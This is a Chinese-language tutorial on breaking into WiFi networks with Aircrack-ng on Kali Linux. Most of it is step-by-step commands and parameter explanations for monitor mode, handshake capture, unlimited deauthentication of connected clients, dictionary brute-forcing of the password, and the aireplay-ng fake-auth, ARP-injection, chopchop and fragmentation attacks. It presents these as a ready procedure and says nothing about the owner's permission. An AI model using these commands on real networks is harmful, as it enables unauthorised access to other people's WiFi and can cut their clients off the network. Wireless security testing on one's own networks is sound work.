使用Aircrack-ng破解WiFi密码
Kali Linux无线攻击
1.安装: apt-get isntall aircrack-ng
2.查看网卡名字:ifconfig
3.设置网卡为监听模式:airmon-ng start wlan0
4.扫描附近的WIFI:airodump-ng wlan0mon
5.选定一个路由器,并监听其流量:airodump-ng -w tplink -c 11 --bssid FF:FF:FF:FF:FF:FF wlan0mon
6.选定连接的一个客户端,进行攻击:aireplay-ng -0 0 -a FF:FF:FF:FF:FF:FF -c FF:FF:FF:FF:FF:FF wlan0mon
7.对抓取到的cap包进行暴力破解:aircrack-ng -w password.txt -b FF:FF:FF:FF:FF:FF handshark-01.cap
详细步骤
1.安装aircrack-ng
sudo apt-get updata
sudo apt-get install aircrack-ng
2.Aircrack-ng 破解WiFi
1.ifconfig查看网卡信息
ifconfig
2.打开网卡监听模式
使用airmon-ng查看网卡
airmon-ng
打开监听模式
airmon-ng start wlan0
扫描附近WiFi
airodump-ng wlan0mon
3.抓握手包
airodump-ng wlan0mon -c 1 --ivs -w handshark.cap --bssid FF:FF:FF:FF:FF:FF
-c:信道
–ivs:初始化向量
–bssid:指定wifi进行抓包
-w后面紧跟要保存的文件的文件名,注意:生成的文件名是handshark.cap
wlan0mon:为之前已经开启监听的网卡名
4.攻击已连接的客户端(打开另外一个终端)
aireplay-ng -0 0 -a 路由器的mac -c 客户端的mac wlan0mon
-0:采用Deauth攻击模式,后面紧跟攻击次数,设置为0,无限攻击,数字多少攻击几次
-a:后面跟路由器的mac地址
-c:后面跟客户端的mac地址
5.破解抓包获取密码
aircrack-ng -w password.txt -b FF:FF:FF:FF:FF:FF handshark-01.cap
-w 为字典地址
-b 指定路由器的MAC地址
3.攻击模式
1.冲突模式
-0 Deautenticate 冲突模式
使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效ARP request。
如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3也无法生成有效ARP request 。所以此时需要用 -0 攻击模式配合,-3 攻击才会被激活
aireplay-ng -0 10 -a <ap mac> -c <my mac> wifi0
[-0] :冲突攻击模式,后面跟发送次数(设置为0,则循环攻击,不停的断开连接,客户端无法正常上网)
[-a]:设置ap的mac
[-c]: 设置已连接的合法客户端的mac
如果不设置-c,则断开所有和ap连接的合法客户端。
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
注:使用此攻击模式的前提是必须有通过合法认证的客户端连接到路由器
2.伪装客户端连接
-1 fakeauth count 伪装客户端连接
这种模式是伪装一个客户端和AP进行连接
这步是无客户端的研究学习的第一步,因为是无合法连接的客户端,因此需要一个伪装客户端来和路由器相连。为让AP接受数据包,必须使用自己的网卡和AP关联。如果没有关联的话,目标AP将忽略所有从你网卡发送的数据包,IVS数据将不会产生
用-1伪装客户端成功连接以后才能发送注入命令,让路由器接受到注入命令后才可反馈数据从而产生数据包
aireplay-ng -1 0 -e <ap essid> -a<ap mac> -h <my mac> wifi0
参数说明:
[-1]:伪装客户端连接模式,后面跟延时
[-e]:设置AP的essid
[-a]:设置ap的mac
[-h]: 设置伪装客户端的网卡MAC(即自己网卡的MAC)
3.交互模式
-2 Interactive 交互模式
这种攻击模式是一个抓包和提数据发起攻击包,三种集合在一起的模式
1.这种模式主要用于研究学习无客户端,先用-1建立虚假客户端连接然后直接发包攻击
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
参数说明:
[-2]:交互攻击模式
[-p]:设置控制帧中包含的信息(16进制),默认采用0841
[-c]:设置目标mac地址
[-b]:设置ap的mac地址
[-h]:设置伪装客户端的网卡MAC(即自己网卡MAC)
2.提取包,发送注入数据包,发包攻击
aireplay-ng -2 -r <file>
-x 1024 wifi0-x 1024是限定发包速度,避免网卡死机,可以选择1024
4.注入攻击
-3 ARP-request 注入攻击模式
这种模式是一种抓包后分析重发的过程,这种攻击模式很有效。
既可以利用合法客户端,也可以配合-1利用虚拟连接的伪装客户端。如果有合法客户端那一般需要等几分钟,让合法客户端和ap之间通信,少量数据就可以产生有效ARP request 才可利用-3模式注入成功。如果没有任何通信存在,不能得到ARP request,则这种攻击就会失败。
aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
参数说明:
[-3]:arp 注入攻击模式
[-b]:设置ap的mac
[-h]:设置自己的mac地址
[-x]:定义每秒发哦是那个数据户包的数量,但是最高不超过1024,建议使用512(也可不定义)
5.chop攻击模式
-4 Chopchop攻击模式
用以获得一个包含密钥数据的xor文件,这种模式主要是获得一个可利用包含密钥数据的xor文件,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。
aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
参数说明:
[-b]:设置需要研究学习的AP的mac
[-h]:设置虚拟伪装连接的mac(即自己网卡的mac)
6.碎片包攻击模式
-5 fragment 碎片包攻击模式
用以获得PRGA(包含 密钥的后缀为xor的文件)这种模式主要是获得一个可利用PRGA,这里的PRGA并不是WEP key数据,不能用来解密数据包。而是利用它产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标AP重新广播包,当AP重广播时,一个新的IVS将产生,我们就是利用这个来研究学习
aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
[-5]:碎片包攻击模式
[-b]:设置ap的mac
[-h]:设置虚拟伪装连接的mac(即自己网卡的mac)